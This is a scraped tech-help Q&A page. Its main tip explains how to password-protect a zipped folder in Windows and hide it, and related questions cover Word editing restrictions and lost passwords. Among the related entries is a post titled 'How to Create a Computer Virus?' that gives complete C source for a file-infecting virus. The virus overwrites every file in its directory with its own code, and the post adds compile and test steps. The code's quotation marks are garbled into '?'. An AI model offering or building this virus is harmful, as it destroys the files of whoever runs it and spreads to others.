Tip & How-To about Computers & Internet

How to Make Invisible Password Protected

How to Make Invisible Password Protected Folder Submitted by Srikanth on Thursday, 10 December 200930 Comments Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.

How to create a Password Protected Folder
Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.
Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.
Step-3: Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.
Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.
Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.
Step-6: Now goto the File menu and select the option Add a password.
ie: File -> Add a password
Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible
Step-1: Now Right-click on this password protected folder and select Properties.
Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).
Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

  • Do not show hidden files and folders
  • Show hidden files and folders
Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.
I hope you like this post. Pass your comments!! Cheers

Posted by on

Computers & Internet Logo

Related Topics:

Related Questions:

0helpful
1answer

Good day, We have microsoft office 2007 installed, it work perfectly, and suddenly it stopped working and threw out an error box that reads as follow; [ This modification is not allowed because this selection is locked( cannot use Microsoft at all)} How can I fix this problem? Please contact me by email: [email protected] Regards Jacques

This behavior may occur if the document is protected with an editing restriction of No changes (Read only) or Comments.

Word 2007

* On the Review tab, click New Comment.

Note If you insert your comments in this document, you can save your changes and then return the document to the sender with your comments.
* In the Protect Document task pane, click Unrestricted Access.


Word 2003

* On the Insert menu, click Comments.

Note If you insert your comments in this document, you can save your changes and then return the document to the sender with your comments.

OR
* On the Protect Document task pane, click Stop Protection.

Note If the Unprotect Document dialog box appears for you to type a password, the document is password-protected and you cannot stop the protection on this document unless you know the password.
0helpful
1answer

How to Create a Computer Virus? Submitted by Srikanth on Friday, 7 December 200781 Comments This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here?s the source code of the virus program. #include #include #include #include #include #include FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(?*.*?,&ffblk,0); while(!done) { virus=fopen(_argv[0],?rb?); host=fopen(ffblk.ff_name,?rb+?); if(host==NULL) goto next; x=89088; printf(?Infecting %s\n?,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(&ffblk); } } printf(?DONE! (Total Files Infected= %d)?,a); end=clock(); printf(?TIME TAKEN=%f SEC\n?, (end-st)/CLK_TCK); getch(); } COMPILING METHOD: BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT?S SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect BORLAND C++ 5.5 (32-BIT) : 1. Compile once,note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it.The new EXE file is ready to infect HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4.All the infected files will be ready to reinfect That?s it

0helpful
8answers

Create a password protected folder without any special software

I found that your post is quite helpful to me but can you help or can i request another set of codes where the password that i type will change in asterisk rather on the real word of the password.
0helpful
1answer

Password Protected Folder Which Is Not Able To To Open

Ask the software firm to help you, the information in the folder is encrypted and you need more than access to the folder.
0helpful
1answer

phone unlock code for GSM mobile phone EF-M295

Hai myname is srikanth i have a problem my phone SGH-E390 phone is freezed & ineed the password of the phone, if any one has idea please mail me to [email protected]

thank's
srikanth
Nov 13, 2008 • Cell Phones
Not finding what you are looking for?

358 views

Ask a Question

Usually answered in minutes!

Top Computers & Internet Experts

Grand Canyon Tech
Grand Canyon Tech

Level 3 Expert

3867 Answers

Brad Brown

Level 3 Expert

19187 Answers

Cindy Wells

Level 3 Expert

6688 Answers

Are you a Computer and Internet Expert? Answer questions, earn points and help others

Answer questions

Loading...